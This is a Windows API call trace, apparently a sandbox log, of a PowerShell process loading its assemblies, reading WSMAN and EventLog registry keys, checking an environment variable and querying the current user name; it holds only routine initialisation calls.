	[0190.126] VirtualQuery (in: lpAddress=0x12b660, lpBuffer=0x12c520, dwLength=0x30 | out: lpBuffer=0x12c520*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.127] VirtualQuery (in: lpAddress=0x12bde0, lpBuffer=0x12cca0, dwLength=0x30 | out: lpBuffer=0x12cca0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.129] VirtualQuery (in: lpAddress=0x12bde0, lpBuffer=0x12cca0, dwLength=0x30 | out: lpBuffer=0x12cca0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.879] CoTaskMemAlloc (cb=0x5a) returned 0x1b964510
	[0203.879] RegQueryValueExW (in: hKey=0x1c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x1b964510, lpcbData=0x12d2e8*=0x56 | out: lpType=0x12d2ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2e8*=0x56) returned 0x0
	[0203.880] CoTaskMemFree (pv=0x1b964510) 
	[0203.883] CoTaskMemAlloc (cb=0x5a) returned 0x1b964510
	[0203.883] RegQueryValueExW (in: hKey=0x1c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x1b964510, lpcbData=0x12d2e8*=0x56 | out: lpType=0x12d2ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2e8*=0x56) returned 0x0
	[0203.884] CoTaskMemFree (pv=0x1b964510) 
	[0203.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0203.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0204.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0204.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0204.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0204.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0205.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0205.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0205.871] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0205.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.871] CoTaskMemFree (pv=0x383d20) 
	[0205.873] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0205.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.873] CoTaskMemFree (pv=0x383d20) 
	[0205.874] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0205.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.874] CoTaskMemFree (pv=0x383d20) 
	[0205.875] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0205.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.875] CoTaskMemFree (pv=0x383d20) 
	[0205.885] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0205.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.885] CoTaskMemFree (pv=0x383d20) 
	[0205.890] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0205.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.890] CoTaskMemFree (pv=0x383d20) 
	[0205.891] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0205.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.891] CoTaskMemFree (pv=0x383d20) 
	[0206.562] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5a8 | out: phkResult=0x12d5a8*=0x1c0) returned 0x0
	[0206.567] RegQueryInfoKeyW (in: hKey=0x1c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d4ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d4a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d4ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d4a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0206.567] CoTaskMemFree (pv=0x0) 
	[0206.568] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0206.568] RegEnumValueW (in: hKey=0x1c0, dwIndex=0x0, lpValueName=0x3631c0, lpcchValueName=0x12d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0206.568] CoTaskMemFree (pv=0x3631c0) 
	[0206.568] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0206.568] RegEnumValueW (in: hKey=0x1c0, dwIndex=0x1, lpValueName=0x3631c0, lpcchValueName=0x12d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0206.568] CoTaskMemFree (pv=0x3631c0) 
	[0206.568] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0206.568] RegEnumValueW (in: hKey=0x1c0, dwIndex=0x2, lpValueName=0x3631c0, lpcchValueName=0x12d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0206.568] CoTaskMemFree (pv=0x3631c0) 
	[0206.569] RegQueryValueExW (in: hKey=0x1c0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d53c, lpData=0x0, lpcbData=0x12d538*=0x0 | out: lpType=0x12d53c*=0x1, lpData=0x0, lpcbData=0x12d538*=0x8) returned 0x0
	[0206.569] CoTaskMemAlloc (cb=0xc) returned 0x1b96a470
	[0206.569] RegQueryValueExW (in: hKey=0x1c0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d50c, lpData=0x1b96a470, lpcbData=0x12d508*=0x8 | out: lpType=0x12d50c*=0x1, lpData="2.0", lpcbData=0x12d508*=0x8) returned 0x0
	[0206.570] CoTaskMemFree (pv=0x1b96a470) 
	[0208.818] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4f8 | out: phkResult=0x12d4f8*=0x180) returned 0x0
	[0208.818] RegQueryInfoKeyW (in: hKey=0x180, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d3fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d3fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0208.818] CoTaskMemFree (pv=0x0) 
	[0208.818] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0208.818] RegEnumValueW (in: hKey=0x180, dwIndex=0x0, lpValueName=0x3631c0, lpcchValueName=0x12d4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0208.818] CoTaskMemFree (pv=0x3631c0) 
	[0208.818] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0208.818] RegEnumValueW (in: hKey=0x180, dwIndex=0x1, lpValueName=0x3631c0, lpcchValueName=0x12d4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0208.818] CoTaskMemFree (pv=0x3631c0) 
	[0208.818] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0208.818] RegEnumValueW (in: hKey=0x180, dwIndex=0x2, lpValueName=0x3631c0, lpcchValueName=0x12d4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0208.818] CoTaskMemFree (pv=0x3631c0) 
	[0208.818] RegQueryValueExW (in: hKey=0x180, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d48c, lpData=0x0, lpcbData=0x12d488*=0x0 | out: lpType=0x12d48c*=0x1, lpData=0x0, lpcbData=0x12d488*=0x8) returned 0x0
	[0208.818] CoTaskMemAlloc (cb=0xc) returned 0x1b96a6d0
	[0208.818] RegQueryValueExW (in: hKey=0x180, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d45c, lpData=0x1b96a6d0, lpcbData=0x12d458*=0x8 | out: lpType=0x12d45c*=0x1, lpData="2.0", lpcbData=0x12d458*=0x8) returned 0x0
	[0208.818] CoTaskMemFree (pv=0x1b96a6d0) 
	[0208.820] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0208.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0208.820] CoTaskMemFree (pv=0x383d20) 
	[0208.824] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0208.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0208.824] CoTaskMemFree (pv=0x383d20) 
	[0208.829] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d528 | out: phkResult=0x12d528*=0x1c4) returned 0x0
	[0208.836] RegQueryInfoKeyW (in: hKey=0x1c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d49c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d498, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d49c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d498*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0208.836] CoTaskMemFree (pv=0x0) 
	[0208.837] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0208.837] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x0, lpName=0x3631c0, lpcchName=0x12d528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.538] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d588 | out: phkResult=0x12d588*=0x340) returned 0x0
	[0209.538] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d588 | out: phkResult=0x12d588*=0x0) returned 0x2
	[0209.538] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d588 | out: phkResult=0x12d588*=0x344) returned 0x0
	[0209.538] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d588 | out: phkResult=0x12d588*=0x348) returned 0x0
	[0209.538] RegCloseKey (hKey=0x348) returned 0x0
	[0209.538] RegCloseKey (hKey=0x1c4) returned 0x0
	[0209.539] RegCloseKey (hKey=0x344) returned 0x0
	[0209.553] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0209.553] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12d798 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d798) returned 0x1
	[0209.554] CoTaskMemFree (pv=0x1b98b0c0) 
	[0209.555] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0209.555] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12d7d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d7d8) returned 1
	[0209.555] CoTaskMemFree (pv=0x3631c0) 
	[0217.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x2e4) returned 0x0
	[0217.001] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d44c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d448, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d44c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d448*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.001] CoTaskMemFree (pv=0x0) 
	[0217.001] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.001] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.001] CoTaskMemFree (pv=0x3631c0) 
	[0217.001] CoTaskMemFree (pv=0x0) 
	[0217.001] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.001] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.001] CoTaskMemFree (pv=0x3631c0) 
	[0217.001] CoTaskMemFree (pv=0x0) 
	[0217.001] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.002] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.002] CoTaskMemFree (pv=0x3631c0) 
	[0217.002] CoTaskMemFree (pv=0x0) 
	[0217.002] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.002] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x3, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.002] CoTaskMemFree (pv=0x3631c0) 
	[0217.002] CoTaskMemFree (pv=0x0) 
	[0217.002] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.002] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x4, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.002] CoTaskMemFree (pv=0x3631c0) 
	[0217.002] CoTaskMemFree (pv=0x0) 
	[0217.002] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.002] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x5, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.002] CoTaskMemFree (pv=0x3631c0) 
	[0217.002] CoTaskMemFree (pv=0x0) 
	[0217.002] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.002] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x6, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.002] CoTaskMemFree (pv=0x3631c0) 
	[0217.002] CoTaskMemFree (pv=0x0) 
	[0217.002] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.002] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x7, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.002] CoTaskMemFree (pv=0x3631c0) 
	[0217.002] CoTaskMemFree (pv=0x0) 
	[0217.002] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0217.002] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x8, lpName=0x3631c0, lpcchName=0x12d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.002] CoTaskMemFree (pv=0x3631c0) 
	[0217.002] CoTaskMemFree (pv=0x0) 
	[0217.002] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x354) returned 0x0
	[0217.002] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x0) returned 0x2
	[0217.003] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x358) returned 0x0
	[0217.003] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x0) returned 0x2
